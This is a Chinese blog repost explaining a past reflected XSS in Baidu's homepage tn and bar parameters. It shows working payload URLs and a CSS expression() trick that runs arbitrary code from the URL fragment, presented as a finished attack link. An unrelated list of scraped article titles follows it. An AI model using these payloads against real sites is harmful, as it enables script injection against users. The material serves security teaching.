拿百度主页曾经的一个XSS做个演示,这个漏洞是由于百度主页tn和bar参数过滤不严导致的参数型XSS:

http://www.baidu.com/index.php?tn="/**/style=xss:expression(alert(‘xss‘));  
http://www.baidu.com/index.php?bar="/**/style=xss:expression(alert(‘xss‘));

tn和bar两个参数对应在页面的输出是两个input表单值,可以使用”(双引号)闭合表单值,加入CSS属性跨站,页面具体输出如下:

<input type=hidden name=tn value=""/**/style=xss:expression(alert(‘xss‘));">

这个漏洞只能在IE下使用,FIREFOX会把URL链接参数中的”(双引号)转成编码%22,页面参数的输出也会变成%22,就不能闭合”(双引号)跨站。expression()是个不听话的角色,这里可以用一个小技巧来去掉expression烦人的死循环。运行当前URL的#注释符后的代码:

eval(unescape(location.hash.substr(1)))

给window对象的方法定义一个值,判断这个值运行一次代码:

(window.r!=1)?eval(‘window.r=1;eval(unescape(location.hash.substr(1)))‘):1

最后得到完美的攻击链接:

http://www.baidu.com/index.php?bar="/**/style=xss:expression((window.r!=1)?eval(‘window.r=1;eval(unescape(location.hash.substr(1)))‘):1);#alert%28%29

转载于:https://www.cnblogs.com/itchong/p/abcd9.html

一个典型的参数型跨站脚本漏洞相关推荐

  1. pplive网站存在存储型跨站脚本漏洞

    漏洞详情 披露状态: 2010-08-03: 积极联系厂商并且等待厂商认领中,细节不对外公开 2010-08-03: 厂商已经主动忽略漏洞,细节向公众公开 简要描述: 存储型 详细说明: 登录后选择修 ...

  2. WordPress podPress插件‘playerID’参数跨站脚本漏洞

    漏洞名称: WordPress podPress插件'playerID'参数跨站脚本漏洞 CNNVD编号: CNNVD-201303-206 发布时间: 2013-03-13 更新时间: 2013-0 ...

  3. WordPress yolink Search插件‘s’参数跨站脚本漏洞

    漏洞名称: WordPress yolink Search插件's'参数跨站脚本漏洞 CNNVD编号: CNNVD-201302-073 发布时间: 2013-02-05 更新时间: 2013-02- ...

  4. xss 跨站脚本漏洞 php,跨站脚本漏洞(XSS)基础讲解

    XSS漏洞 一.文章简介 XSS漏洞是Web应用程序中最常见的漏洞之一.如果您的站点没有预防XSS漏洞的固定方法,那么很可能就存在XSS漏洞. 这篇文章将带你通过代码层面去理解三个问题: 什么是XSS ...

  5. XSS(跨站脚本)漏洞详解之XSS跨站脚本攻击漏洞的解决

    XSS(跨站脚本)漏洞详解 XSS的原理和分类 跨站脚本攻击XSS(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆, ...

  6. [ 常见漏洞篇 ]常见web漏洞总结------XSS跨站脚本漏洞

    本文简单的总结了一下XSS的知识点 主要是从面试的角度来总结的 如果想从事安全方向,那么这些基本的漏洞都是需要掌握的 目录 一.XSS形成原因: 二.XSS分类: 1. 反射型XSS 2. 存储型XS ...

  7. c++ error函数_Linux中create_elf_tables函数整型溢出漏洞分析(CVE201814634)

    在这篇文章中,我们将跟大家分析Linux平台中createelftables函数的一个整型溢出漏洞(CVE-2018-14634). 概述 在近期的一次安全分析过程中,我们在64位Linux系统内核里 ...

  8. WordPress Platinum SEO插件跨站脚本漏洞

    漏洞名称: WordPress Platinum SEO插件跨站脚本漏洞 CNNVD编号: CNNVD-201309-398 发布时间: 2013-09-24 更新时间: 2013-09-24 危害等 ...

  9. WordPress BuddyPress Extended Friendship Request插件跨站脚本漏洞

    漏洞名称: WordPress BuddyPress Extended Friendship Request插件跨站脚本漏洞 CNNVD编号: CNNVD-201307-609 发布时间: 2013- ...

最新文章

  1. PyTorch框架:(6)图像识别实战常用模块解读
  2. 老生常谈--GetROProperty,GetTOProperty,SetTOProperty的区别
  3. vue-router之 beforeRouteEnter
  4. java怎么播放不了声音,java – 为什么这段代码不播放声音文件
  5. 功率驱动电路中元件的选择
  6. ubuntu1804系统设置在哪里_电销呼叫系统CRM功能设计
  7. Java注解原理解析 转载至:梅仁
  8. React Native运行原理解析
  9. oracle 字段和当前时间比较,请教如何按照当前时间与数据库表中的字段时间比较提取记录,涉及跨天...
  10. 小米4C未解锁刷机教程
  11. 凤凰系统(Phoenix OS)PC版安装,电脑上体验功能丰富的安卓系统
  12. 新手练字又快又好的方法
  13. Verilog HDL实现智能药盒
  14. C#生成Word文档
  15. 弄明白了清华校训“自强不息 厚德载物”的来龙去脉
  16. 如何掌握电烙铁焊接技术
  17. 从今开始,两耳不闻窗外事,一心搞dp
  18. 九步!让你从零基础学习python成为一名开源程序员!
  19. ded汉语意思_DED是什么意思
  20. SSMS18.9.1证书被颁发者直接吊销

热门文章

  1. 【牛客 - 185F】 假的数学游戏(斯特林公式,大数Java打表)
  2. 【HDU - 1285】确定比赛名次 (拓扑排序)
  3. unsigned int mysql_mysql 中int类型字段unsigned和signed的探索
  4. 大量html乱码seo,HTTPS改造之后网页错位乱码,影响SEO和正常访问,应该这样改
  5. php整站防注入程序,一个不错的php通用防注入程序
  6. 编写程序,随机产生20个0到1之间的数,将这20个数写入文本文件中,要求每行5个数
  7. 铜仁计算机专业学校,听说计算机专业的在本部啊 这是真的么
  8. 硬件结构图_那曲地表水电子除垢仪结构图
  9. C++ 右值引用 | 左值、右值、move、移动语义、引用限定符
  10. leetcode86. 分隔链表